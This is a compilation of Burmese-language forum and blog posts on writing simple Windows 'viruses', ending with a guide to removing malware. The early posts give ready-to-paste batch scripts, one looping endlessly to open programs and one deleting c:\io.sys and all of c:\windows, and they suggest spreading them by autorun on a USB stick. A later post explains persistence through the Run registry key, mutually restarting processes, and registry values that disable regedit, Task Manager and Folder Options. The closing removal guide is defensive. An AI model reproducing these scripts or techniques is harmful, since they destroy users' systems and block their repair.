ဒါဆိုရင္အေတာ္ေလးနိပ္ျပီေနာ္ အဲဒိကုပ္ေတြကို notpadမွာေရးျပီးရင္
.cmd ဒါမွမဟုတ္ .bat နဲ႕safeဒါဆို ဗိုင္းရက္စ္တစ္ေကာင္ရျပီ
auto run fileေလးလုပ္ စတစ္ေလးထဲထည္႕
သူငယ္ခ်င္းကိုေပး . . အဲလိုေတာ့လုပ္ပါနဲ႕ဗ်ာ . . .
ဗိုင္းရက္ဆိုတာေကာင္းတဲ့အေကာင္မွမဟုတ္ပဲ
စမ္းၾကည္႕ဖို႕ပဲေနာ္
မေသခ်ာရင္မလုပ္ၾကနဲ႕ဦး
ေတာ္ၾကာနတ္ေဆးေၾကာင့္ဆားဗစ္ေရာက္ေနဦး မယ္ . . .
ကဲကဲ လုပ္စမ္းၾကည္႕ဗ်. . .
copy-http://www.mmitdev.c
ပထမဦးဆံုးNotepad အသစ္တစ္ခုကိုိုဖြင့္ပါ။
ေအာက္ပါ code ကို copy ကူးလိုက္ပါ။
StrText=”Ma Yar I love you”
Set Objvoice=Createobject(“SAPI.SpVoice”)
ObjVoice.Speak StrText
ျပီးရင္ Ma.vbs ျဖင့္ Save မွတ္လိုက္ပါ။
Run ၾကည္.လိုက္ပါ။
“Ma Yar I love You” ဆိုၿပီးအသံထြက္ခဲ့ပါမယ္။
ထက္ၿပီးအသံုခ်ခ်င္သူမ်ား”Ma Yar I love You”ေနရာမွာေျပာင္းႏိုင္ပါတယ္။
The Forum post is edited by mryto Sep 6 ’10
ဒါေလးကလဲ Bat ဖိုင္နဲ.ထြက္ တဲ. Virus ေလးပါပဲ ။ RESTART ခ်လိုက္ရင္ ၿပန္ေပ်ာက္သြားနိုင္ပါတယ္။
@echo off
:A
start dir
start command
start firefox
start explorer
start notepad
goto:A
Window Delete
Virusဆိုတာတကယ္ေတာ.စာသားေတြပါပဲ။ခက္တာကအဲဒီစာလံုးေလးေတြကcomputer ေတြကို
ဒုကၡေပးေနတာပါ။ ဒီေန.ေတာ.အလြယ္ဆံုး virusေရးနည္းေလးတခုေၿပာၿပပါမယ္။ပထမဆံုး Text
document ေလးတခုလုပ္လိုက္ပါ။ပီးရင္ေတာ. ေအာက္ပါအတိုင္းစာသားေလးေတြေရးလိုက္ပါ။
@echo off
atrr ib-a-s-r-h
cls
del c:\io.sys
cls
del c:\windows\*.*
cls
ၿပီးရင္ေတာ. File ထဲမွာ မိမိႏွစ္သက္တဲ.နာမည္ေရးၿပီး ေနာက္က batဖိုင္နဲ.ထြက္လိုက္ပါ ။
name +bat လို.ေရးလိုက္ပါ။ဒါဆိုရင္ virus အေသးစားေလးၿဖစ္သြားပါၿပီ။
ဒါေပမယ္. ဒီအေၿခခံသေဘာတရားေလးဟာ အရင္ကနာမည္ၿကီးခဲ.တဲ. flashy virus ရဲ.အ
ေၿခခံသေဘာတရားေလးပဲၿဖစ္ပါတယ္။
ဒီထက္ ပို ေကာင္းတဲ. ပိုဒုကၡေပးနိ ုင္တဲ. အရာေလးေတြထပ္မံေဖာ္ၿပေပးပါဦးမယ္။Google နဲ.
တၿခားဆိုက္ေတြထဲက ေမးလ္းေတြထဲကပို.လို.မရပါ။ပို.ခ်င္ရင္ေတာ. Zip ဖိုင္ေလးေတြနဲ.တြဲပို.
လို.ရပါတယ္။ေနာက္မွထပ္မံေဖာ္ၿပပါမယ္။
-------------------------------------------------------------------------------------------------------------

Thursday, October 24, 2013

Virus အားျမင္ေအာင္ၾကည့္ျခင္း



Virus ဆိုတာဘာလဲ ?

Virus Theory

Virus ကိုဘယ္လိုေရးလဲ ေမးျပီးေတာ့ ထပ္ေမးျပန္ျပီ...
Virus ကိုဘာနဲ႕ ေရးရင္ အေကာင္းဆံုးလဲတဲ့....
ေနာက္ျပီး ဘယ္လိုေရးသင့္လဲ....
ဘယ္လို အလုပ္လုပ္ရင္ virus က ေၾကာက္ဖို႕ေကာင္းလာမလဲ....
အခု အဲဒီအေၾကာင္းေလး ေျပာရတာေပါ့...

အမ်ားအားျဖင့္ေတာ့....
Virus က တကယ္တန္းၾကေတာ့ Computer ကို ဖ်က္ဖို႕....
ဒါေပမယ့္ Antivirus ေတြက သိၾကတယ္...
Virus ေတြကိုဘယ္လို သိၾကတာလဲဆို...
သူတို႕က Virus Sample File ေတြကေနသိၾကတယ္...
သူတို႕ Antivirus ထဲမွာရိွတဲ့ Sample File ေတြထဲက မရိွရင္....
အဲဒီ Virus ကိုမသိေတာ့ဘူး....

ေနာက္တစ္ခ်က္က်ေတာ့ Antivirus ေတြက စစ္ရင္ File တစ္ခု ထုတ္လုိက္တယ္...
အဲဒီ File မွာ virus ကူးမကူးကေန သိၾကပါတယ္...

အဲဒါကေတာ့ antivirus ေတာ္ေတာ္မ်ားမ်ား အလုပ္လုပ္ပံုပါ....

Virus က စမယ္ဆိုကတည္းက 1 file ထဲနဲ႕ လုပ္လို႕မျဖစ္ပါဘူး...
အနည္းဆံုး file 2 file မွ ျဖစ္မွာပါ...
ဘာျဖစ္လို႕လည္းဆို...
file 1 file ကို ပိတ္လိုက္ရင္ ေနာက္ file တစ္ file က အဲဒါက ျပန္ဖြင့္ေပးမလို႕ပါ...

ကဲ...
A က တကယ့္ virus
B ကေတာ့ A ကို အကူအညီေပးဖို႕ေပါ့...

A ကို run တာနဲ႕....
B လည္း run မယ္...

ဒါမွ မဟုတ္ B ကို run တာနဲ႕
A လည္း run မယ္..

အဲဒီပံုစံေပါ့...
A ကေတာ့ virus အလုပ္ေတြလုပ္မယ္...
B ကေတာ့ A ရိွမရိွစစ္ေနမယ္...
A ကလည္း B ရိွမရိွစစ္မွာပဲ...

user က virus ကိုေတြ႕ျပီ Process ေတြ ထဲမွာ...
A ကိုအရင္ ပိတ္လိုက္မယ္...
ျပီးမွ B ကိုပိတ္မယ္...
အဲလို စဥ္းစားျပီး A ကို ပိတ္လိုက္တာေပါ့...

ဒါေပမယ့္ A ကိုပိတ္လိုက္တာနဲ႕ B က ခ်က္ခ်င္း A ကိုျပန္ေခၚဖြင့္တယ္....
အဲမွာ virus သတ္တဲ့ေကာင္ေတြ စားကုန္ၾကေရာ...
B ကို ပိတ္ေတာ့လည္း A က ျပန္ဖြင့္ေပး...
ႏွစ္ခုလည္း တျပိဳင္တည္း ပိတ္ဖို႕ကလည္း မျဖစ္ႏိုင္ဘူး..
ကဲဒါဆို ဘယ္လိုလုပ္မလဲ....
အခုတေလာ အဲလို virus ေတြ ေတာ္ေတာ္မ်ားမ်ား အေရးမ်ားလာပါတယ္...

အဲလို virus ေတြကို ဖ်က္ဖို႕ဆိုရင္ေတာ့ ကိုယ့္စက္က hard disk နဲ႕မတက္နဲ႕...
ျဖဳတ္သြားလိုက္.. တျခားစက္မွာ secondary နဲ႕ တက္...
A ေကာ B ပါရွာဖ်က္လိုက္... ျပီးျပီ...

virus ေတြ windows စစခ်င္းအလုပ္လုပ္ေအာင္...
Registery ထဲမွာ
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
အဲဒီေအာက္မွာ File ပတ္လမ္းေၾကာင္းေရးထားခဲ့မယ္ဆိုရင္ေတာ့
ေရးထားတဲ့ program ကို windows စစတက္ျပီးတာနဲ႕ run ေပးမွာပါ...

A ဆိုတဲ့ virus က အဲဒီ registery ဆိုတဲ့ေနရာမွာ အခ်ိန္တိုင္း သြားသြားေရးခိုင္းထားပါမယ္...
ဒါဆိုရင္ user က msconfig နဲ႕၀င္ သြားျပီး windows တက္တက္ျခင္းမွာ မတက္ေအာင္ လုပ္လည္း မထူးေတာ့ဘူးေပါ့....

ေနာက္ထပ္နည္းကေတာ့ registery ကို ပိတ္တဲ့နည္း

User Key: [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
Value Name: DisableRegistryTools
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = allow regedit, 1 = disable regedit)

အဲမွာ REG_DWORD ကို create လုပ္ျပီးေတာ့ value မွာ 1 ထည့္လိုက္ရင္ေတာ့ user က registery သံုးလို႕မရေတာ့ပါဘူး...

ေနာက္ျပီးေတာ့ Task Manager ( Ctrl+Alt+Del ) ကိုေဖ်ာက္လိုက္ခ်င္ရင္ေတာ့

User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
System]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
System]
Value Name: DisableTaskMgr
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = default, 1 = disable Task Manager)

အဲမွာ REG_DWORD ကို create လုပ္ျပီးေတာ့ value မွာ 1 ထည့္လိုက္ရင္ေတာ့ user က registery သံုးလို႕မရေတာ့ပါဘူး...

Folder Option ကို ထပ္ျပီးေဖ်ာက္လိုက္ခ်င္ရင္ေတာ့

User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Value Name: NoFolderOptions
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = show options, 1 = hide options)

အဲမွာ REG_DWORD ကို create လုပ္ျပီးေတာ့ value မွာ 1 ထည့္လိုက္ရင္ေတာ့ user က Folder Option ကို Tool -> Option

မွာမျမင္ရေတာ့ပါဘူး...

တနည္းေျပာရရင္ ကၽြန္ေတာ္တို႕ registery ကို ေကာင္းေကာင္းေလး ကလိလို႕ရတာနဲ႕ Computer ၾကီးကို လိုသိလို ထိန္းလို႕ရပါတယ္... AVG ကေတာ့ Registery ကို မစစ္ေဆးပါဘူး... ဒါေပမယ့္ BitDefender ကေတာ့ စစ္တယ္ဗ်... ေျပာင္းတာနဲ႕ ေျပာင္းမေျပာင္းေမးတယ္... အဲလိုမ်ဳိး Antivirus ေတြအတြက္ေတာ့ မလြယ္ဘူးေပါ့....

Registry ပိုင္းကို http://www.pctools.com/guides/registry မွာေလ့လာလို႕ရပါတယ္..

ဘာနဲ႕ ေရးသင့္လဲလို႕ ေျပာရင္ ကိုယ္သန္ရာနဲ႕ေတာ့ေရးလို႕ရေပမယ့္...
ဘယ္ OS ကို တိုက္ခိုက္မွာလဲ ဆိုတာ စဥ္းစားရမယ္...
Vbscript(.vbs) ကို linux မွာ သံုးလို႕မရဘူး...
ဒါေပမယ့္ Javascript(.js) နဲ႕ေတာ့ linux မွာ၇တယ္...
Windows မွာလည္းရတယ္...
Javascript(.js) ကေတာ့ ဘယ္လိုထိ လုပ္ပိုင္ခြင့္ေပးလဲဆိုတာ ကၽြန္ေတာ္ေသေသခ်ာခ်ာမသိဘူး...
windows အတြက္ကေတာ့ .vbs ကေတာ္ေတာ္ေလး ထိေရာက္တယ္...
ကစ္လို႕ေကာင္းတယ္...

.exe ေတြနဲ႕လည္း တိုက္ခိုက္လို႕ရတယ္...
ဒါေပမယ့္...
ကိုယ္ထုတ္လိုက္တဲ့ .exe ဟာ runtime file မပါပဲနဲ႕ run လုိ႕ရရမယ္...
Windows နဲ႕ Linux က file တည္ေဆာက္ပံုေတြ မတူညီၾကဘူး...
ဒါေၾကာင့္ Linux အတြက္ virus က Linux မွာပဲ ရမယ္...
Windows အတြက္ virus ကေတာ့ windows မွာပဲထိေရာက္မွာေပါ့...

ဥပမာ java နဲ႕ေရးထားရင္ java runtime မပါပဲနဲ႕ java က run လို႕မရဘူး...
ဒါဆိုရင္ေတာ့ မေရးသင့္ဘူးေပါ့... java runtime ရိွတဲ့စက္ကိုပဲ ထိမွာေလ...
.NET နဲ႕ ေရးျပန္ေတာ့လည္း .NET Framework ရိွမွ အလုပ္လုပ္မွာ...
ဒါဆိုလည္း .NET အတြက္က သိပ္မဟုတ္ေသးဘူး....
vb ကေတာ့ ရတယ္... ဘာ compoment မွ မသံုးပဲေရးရင္ runtime မလိုေလာက္ဘူး...
ဒါေၾကာင့္ vb နဲ႕ဆိုရင္ေတာ့ ရေလာက္တယ္...
script file ေတြကေတာ့ OK တာေပါ့...
run time မပါဘူး...
windows က run ေပးတယ္....
အဲဒါေၾကာင့္ အမ်ားအားျဖင့္ .vbs နဲ႕အေရးမ်ားတယ္...
ေနာက္ျပီး C ... အဲဒါ အရင္ကတည္းက programming...
သူ႕ exe က စက္တိုင္းလိုလိုအသာေလး run လို႕ရတယ္...
C နဲ႕ virus ေရးလို႕ရတယ္...
C က system အထဲထိ ေကာင္းေကာင္းေရးႏိုင္တယ္...
hardware ေတြကိုပါ ဒုကၡေပးႏိုင္တယ္...

တခ်ဳိ႕ virus ေတြက hardware ေတြကို တိုက္ရိုက္မဟုတ္ပဲ သြယ္၀ိုက္ျပီးေပးတာ...
ဘယ္လိုလည္းဆိုရင္ေတာ့
Memory မွာ အျပည့္တင္ထားတယ္.. File ေတြကို...
ဒါဆို user က စက္ၾကီးေလးသြားျပီ...
ဘာမွ မလုပ္ႏိုင္ဘူး....
memory ေပၚမွာလည္း အခ်ိန္ျပည့္ wirte မယ္...
ဒါဆို ၾကာရင္ memory ၾကြသြားမွာေပါ့...

အဲလိုမ်ဳိး...
Process မွာ အျပည့္တင္ထားမယ္...
process ေတြကို အေသအေၾက ခိုင္းထားမယ္..
ဒါဆို ၾကာ၇င္ Process က်လာမယ္...
ေနာက္ဆံုး ပ်က္သြားႏိုင္တယ္...

virus ရိွတဲ့ စက္ထဲကို
flash disk ကိုထိုးထားလိုက္တယ္..
ေနာက္ျပီး...
ျပန္မျဖဳတ္ပဲ...
ဒီအတိုင္း Computer ကို စက္သံုးေနတယ္..
အဲဒီ အခ်ိန္မွာ virus က Flash Disk ေပၚမွာ virus ေတြ အခ်ိန္တိုင္း write ေနမယ္...
ၾကာရင္ flash disk မွာ write တာ မ်ားလြန္းေတာ့ bad sector ေတြေပၚလာမယ္...
အဲဒါကို မသိပဲ user က ဆက္သံုးတယ္... chkdsk နဲ႕ commond prompt မွာ ၀င္မစစ္ဘူး...
badsector ေတြကိုလည္း မျပင္ဘူးဆိုရင္ ၾကာရင္ flash disk ပါၾကြသြားႏိုင္တယ္...

virus ပိုင္းဘယ္လိုေရးရလဲဆိုတာ ကို source code နဲ႕ ေရွ႕မွာ ျပထားဘူးပါတယ္...
ဘယ္လိုလုပ္ရင္ ေကာင္းမလဲ...
ဘယ္လိုေတြ လုပ္ႏိုင္လဲဆိုတာေလးကို အခုမွ ေျပာျပျဖစ္ေတာ့တယ္..

ကိုယ့္ေပ်ာ္ရႊင္မႈေၾကာင့္ သူတစ္ပါး ဒုကၡမေရာက္ပါေစနဲ႕လို႕ ဆုေတာင္းပါတယ္ဗ်ာ...

Virus မ်ား




အေၿခခံ ကြန္ပ်ဴတာ Virus မ်ားရွင္းလင္းၿခင္း




တကယ္တမ္း ကြန္ပ်ဴတာ ဗိုင္းရပ္စ္ ေတြကုိ ရွင္းလင္းရတယ္ဆုိတာ လြယ္ကူတဲ႔ကိစၥမဟုတ္သလုိ မိမိရဲ႕ အဖိုးတန္တဲ႔ အခ်ိန္တစ္ခ်ဳိ႕ကုိေပးဆပ္ၾကရတာပါ။ ဘယ္ကြန္ပ်ဴတာမွ Virus တစ္မ်ဳိးတည္း ရတယ္ဆုိတာ မရွိပဲနဲ႔ မိမိရဲ႕အိမ္မွာ ပုရြက္ဆိတ္ေလးေတြ ၀င္လာသလုိပါပဲ ေနာက္ဆုံး တပ္စုၾကီးနဲ႔ပဲ ၿပန္လည္ထြက္ခြာသြားၾကတာပါ။ Antivirus ဆုိတာ အေကာင္းမြန္ဆုံး ကာကြယ္ေရး တပ္ဖြဲ႕ၾကီးၿဖစ္တယ္ သုိ႔ေပမယ့္လည္း ၄င္း Antivirus က out of date ၿဖစ္ေနမယ္ဆုိရင္ အသုံး၀င္တဲ႔ antivirus program တစ္ခုၿဖစ္လာမွာမဟုတ္ပါဘူး။ ဒီေတာ့ virus ေတြကုိ ခုခံတုိက္ခုိက္ဖုိ႔၊ virus ရွိမရွိဆုိတာ သိဖုိ႔အတြက္ သံသယၿဖစ္ဖြယ္ရာ processing ေတြ၊ ဖုိင္ေတြကုိ သိဖုိ႔လုိပါတယ္။ ဒီလုိ ဒုကၡေပးႏုိင္တဲ႔ virus ေတြကုိ config, taskmanager နဲ႔ autoruns tools ေတြနဲ႔ ရွာေဖြၾကရတယ္။ ဒါေၾကာင့္ သံသယ ၿဖစ္ဖြယ္ process ေတြကုိ မိတ္ေဆြတုိ႔အေနဲ႔ ရွာေတာ့မယ္ဆုိရင္ ဒီ file က ဘယ္ကလာတာလဲ၊ registry keys ေတြအတြက္ ေလးလံေစတဲ႔ ဖုိင္ေတြလား၊ ဘယ္လုိ services ေတြကုိ အသုံးၿပဳေနလဲ၊ ဘယ္ startup program ေတြထဲမွာ ဘယ္လုိဖုိင္ေတြအေနနဲ႔ ၀င္ေရာက္ အသုံးၿပဳေနလဲဆုိတာကုိ သိဖုိ႔လုိပါတယ္။ အကယ္၍မ်ား virus ကုိ ရွင္းလင္းလုိက္ဖုိ႔ ၂ နာရီေလာက္ အခ်ိန္ၾကာမယ္ဆုိရင္ အဲ႔လုိရွင္းလင္းလုိက္ဖုိ႔ထက္ Operating System ကုိၿပန္လည္၍ အသစ္တင္လုိက္မည္ဆုိေသာ အခ်က္နဲ႔ ညိွႏႈိင္းရပါလိမ့္မယ္။ ဒါက အခ်ိန္ကုန္မခံေစခ်င္တဲ႔အတြက္ ေၾကာင့္ပင္ၿဖစ္သည္။

Virus ရဲ႕ အဓိပၸါယ္။
အရုိးရွင္းဆုံး ေ၀ါဟာရတစ္ခုအေနနဲ႔ Computer Virus ဆုိတာ သူကုိယ္တုိင္ ဖုိင္တစ္ခုကုိ ဖန္တီးႏုိင္တယ္ ကူးယူႏုိင္တယ္။ လုံၿခံဳေရး ဆုိင္ရာ program ေတြကုိ စိန္ေခၚ ၿခိမ္းေၿခာက္ႏုိင္တဲ႔ အစြမ္းေတြရွိတယ္။ တစ္ခ်ဳိ႕ virus ေတြက သတ္မွတ္ထားတဲ႔ ဖုိင္ေတြကုိ delete လုပ္ႏုိင္တယ္၊ တစ္ခ်ဳိ႕က user ေတြ ကြန္ပ်ဴတာရဲ႕ password နဲ႔ information ေတြကုိ ခုိးယူႏုိင္တယ္။ တစ္ခ်ဳိ႕ၾကၿပန္ေတာ့ မိမိရဲ႕ ကြန္ပ်ဴတာကုိ OS တက္မလာေလာက္ေအာင္ ဖ်က္စီးမႈ႔လုပ္ႏုိင္ၾကတယ္။
အၾကမ္းဖ်င္းအားၿဖင့္ -
Virus = ကုိယ္တုိင္ copy ကူးယူႏုိင္ေသာ file တစ္ခု
Trojan = virus သုိ႔မဟုတ္ malware ေတြပါ၀င္ေသာ program တစ္ခု
Spyware = ကြန္ပ်ဴတာ ကုိထိန္းခ်ဴပ္ခြင့္ရရန္ သိုမဟုတ္ ၾကားေဖါက္၀င္ေရာက္ႏုိင္ေအာင္ ဖန္တီးထားေတာ့ ဖုိင္ သို႔မဟုတ္ program တစ္ခု
Maleware = ကြန္ပ်ဴတာအား ပုိင္ရွင္၏ ခြင့္ၿပဳခ်က္မရပဲ ပ်က္စီးရာ ပ်က္စီးေၾကာင္း ဖန္တီးႏုိင္ေသာ program
Worm = Network အေပၚမွာ လမ္းသလားေသာ virus

Virus ဖယ္ရွားၿခင္း။
မိမိကြန္ပ်ဴတာမွာ virus ရွိသည္ဟု ယူဆပါက Up to Date ၿဖစ္ေနေသာ Antivirus program ေတြနဲ႔ စစ္ေဆးေပးပါ။ Antivirus program က detect သိလုိ႔ ဖယ္ရွားႏုိင္တယ္ဆုိ ရင္ေတာ့ ကံေကာင္းတာေပါ႔။ AV ေတြ Detect သိတယ္.. Remove မလုပ္ႏုိင္ေတာ့ဘူးဆုိရင္ေတာ့ ၿဖစ္ေနတဲ action နဲ႔ file ကုိ မွတ္သားထားပါ .. ၿပီးရင္ Search Engine မွာ ၄င္းဖုိင္ နဲ႔ ၄င္း virus ရဲ႕ ဒုကၡေပးပုံေတြကုိ ေၿပာဆုိ အကူအညီေတာင္းပါ။ ၿပီးလ်င္လမ္းညြန္အတုိင္းေၿဖရွင္းမွာ။ ေၿဖရွင္းမႈ႔မလုပ္ခင္တုိင္းမွာ မိမိရဲ႕ အေရးၾကီးတဲ႔ ဖုိင္ေတြကုိ backup လုပ္ထားပါ။

Virus Detect မသိခဲ႔ရင္
ကြန္ပ်ဴတာမွာ AntiVirus / AntiSpyware program ေတြအေနနဲ႔ Detect မသိဘူး သုိ႔ေသာ္ ကြန္ပ်ဴတာက အရင္အတုိင္းပဲ ေႏွးၿမဲေႏွးေနမယ္ဆုိရင္ေတာ့ background processes ေတြကုိ ၾကည့္ရပါလိမ့္မယ္။ ဒီအတြက္ special tool ေလးေတြက အဓိက တာ၀န္ထမ္းေဆာင္ရလိမ့္မယ္။ ဥပမာ :- task manager, autoruns, process explorer and hijackthis တုိ႔လုိေပါ႔။

Checking Running Processes
ကၽြန္ေတာ္တုိ႔ PC တစ္လုံး Error ၿဖစ္တယ္ဆုိရင္ ပထမဦးဆုံးအၾကိမ္ task manager (Ctrl + Alt+ Del) ကုိ ေခၚၾကည့္တယ္. ၿပီးရင္ ဘယ္လုိ file နဲ႔ services ေတြ Run ေနလဲ Memory usage ေတြဘယ္ေလာက္မ်ားမ်ားကုိ ဘယ္လုိ file ေတြက အသုံးၿပဳေနလဲဆုိတာကုိၾကည့္မယ္။ ၿပီးရင္ System Configuration Ultility (RUN>msconfig) က ေနဘယ္ serivces ေတြ နဲ႔ ဘယ္ဖုိင္ေတြက Operating System (Windows ) startup မွာ ၀င္ေရာက္ေနလဲဆုိတာကုိပါၾကည့္ပါ။အကယ္၍ starup မွာ ထူးထူးၿခားၿခား file အမည္ေလးေတြနဲ႔ ၀င္ေနတာေတြ႔ရင္


တုိ႔မွာသြားၿပီး ဖုိင္အမည္ကုိ ရုိက္ထည့္စစ္ေဆးၾကည့္ပါ။ ဘာေၾကာင့္လဲဆုိေတာ့ တစ္ခ်ဳိ႕ ဖုိင္ေတြက system file ေတြနဲ႔ပုံစံတူေတြၿဖစ္ေနတတ္တယ္။ မိမိကြန္ပ်ဴတာအတြက္ အေရးမပါတဲ႔ processes ေတြကုိ end လုပ္ပါ။

System Configuration Utility


RUN dialog box မွာ msconfig ဆုိၿပီးေတာ့ ရုိက္ထည့္လုိက္ ၿပီးရင္ System Configuration Utility ဆုိတာေပၚလာမယ္... ဒါကေတာ့ Microsoft Windows မွာဆုိရင္ အေကာင္းဆုံး ကြန္ပ်ဴတာကုိၿပင္ဆင္မႈ႔ပုိင္းမွာ အေထာက္အကူၿပဳတဲ႔ utility ပဲၿဖစ္တယ္။ ေနာက္ဆုံး ဘာမွမသိဘူးပဲထား startup tab မွာ Disable All ဆုိတာကုိ ႏုိပ္မယ္။ ေနာက္ Services tab မွာ Hide All Microsoft Services ဆုိတာကုိ အမွန္ၿခစ္မယ္. ၿပီးရင္ Disable All ဆုိၿပီးႏုိပ္ restart လုပ္လုိက္ရင္ မိမိရဲ႕ ကြန္ပ်ဴတာ system ဟာပုံမွန္ထက္သိသိသာသာကုိ ေကာင္းမြန္လာတာကုိေတြ႔ရလိမ့္မယ္။ ဒီပုံစံနဲ႔ တစ္ခါတစ္ေလ ဘာ error မွန္းမသိ (အထူးသၿဖင့္ Software Conflict ၿဖစ္၍ windows normal ၀င္မရၿခင္း) တဲ႔ ၿပႆနာေတြကုိ F8 ႏုိပ္ကာ Safe Mode ထဲကေန ၿပင္ၿပီးသုံးသြားရင္ေတာင္ အဆင္ေၿပပါတယ္။

All-in-one diagnostic Tools
Autoruns


ဒီ software က Task manager, msconfig and the services list ေတြ စသည့္ system diagnostic အစုံပါတဲ႔ freeware ေလးတစ္ခုပါ။

Process Explorer

ဒါေလးကေတာ့ အေပၚက ပုံစံပါပဲ.. သူ႔ရဲ႕ ထူးၿခားခ်က္ကေတာ့ file တစ္ခုၿခင္းစီအတြက္ ကုိယ္ပုိင္ ထိန္းခ်ဳပ္မႈ႔ပါ၊ CPU,IO,VM ေတြအၿပင္ performace graphed ေတြပါတယ္။

Hijack This

Technician ေတြနဲ႔ ကြန္ပ်ဴတာ နဲ႔နည္းစပ္သူေတြေတာ္ေတာ္ေတာ္မ်ားမ်ားသိၾကတဲ႔ Tool ပါ။ ဒါေပမဲ႔ ၄င္းတုိ႔မွာ ပါ၀င္တဲ႔ R0,R1,R2,R3 / F0,F1,F2,F3 / 01 / 04 / 23 စသည့္ notable entries ေလးေတြကုိ သတိမထားမိတတ္ပါဘူး။ R0,R1,R2,R3 ဆုိတာက အင္တာနက္ အြန္လုိင္း အမွားအယြင္းေတြ၊ အထူးသၿဖင့္ Internet Browser ေတြေပါ႔... အေသးစိတ္ကုိ


Malware Bytes

Antivirus Program ေတြက ၄င္းတုိ႔ရဲ႕ Virus Signiture ေတြနဲ႔ၿငိတဲ႔ ဖုိင္ေတြကုိ စစ္မယ္၊ Anti Spyware ေတြက Registry Entries မွာ ၄င္းတုိ႔ Spyware အၿဖစ္သတ္မွတ္ထားတဲ႔ ဖုိင္ေတြကုိ စစ္မယ္။ ဒါေပမဲ႔ တစ္ခ်ဳိ႕ malware ေတြကုိ antivirus ေတြ antispyware ေတြ Detect သိေသာ္ၿငားလည္း သူတုိ႔ကုိ Delete မလုပ္ဘူး( Delete လုပ္ဖုိ႔လည္း သူတုိ႔မွာ Power မရွိသလုိ၊ System File လား၊ ဘာလား မခြဲၿခားႏုိင္ၿခင္း၊ ၄င္း malware ေတြနဲ႔ familiar ၿဖစ္ေနၿခင္း)။ (မွတ္ခ်က္ - တစ္ခ်ဳိ႕ Antivirus program ေတြက အဲ႔လုိ malware ရရင္ ေတြ႔သမွ် အကုန္ဖ်က္ပါတယ္...ဘာဖုိင္မွကုိမထားပါဘူး။ ၿပီးရင္ေတာ့ စက္ေတာင္ မတက္ေတာ့ဘူး။ မိမိရဲ႕ ကြန္ပ်ဴတာက malware ကုိက္လုိ႔ ဘာမွမၿဖစ္ပဲနဲ႔ Antivirus run လုိက္မွ ေနာက္ဆုံး ရွိတဲ႔ ဖုိင္ေလးေတြပါ အကုန္ေၿပာင္သြားတတ္ပါတယ္။) ဒါေၾကာင့္ ၄င္း malware ေတြက မိမိရဲ႕ Running System နဲ႔ Applications ေတြကုိ နည္းမ်ဳိးစုံနဲ႔ဒုကၡေပး၊ application သုံးေနရင္းနဲ႔ ရုတ္တရက္ပိတ္၊ error က် အဲ႔လုိေတြၿဖစ္လာတတ္တယ္။ ဒီအတြက္ Maleware Bytes ဆုိတဲ႔ software ေလးက အဆင္ေၿပဆုံးပါ။
ေက်းဇူးတင္ပါတယ္ ။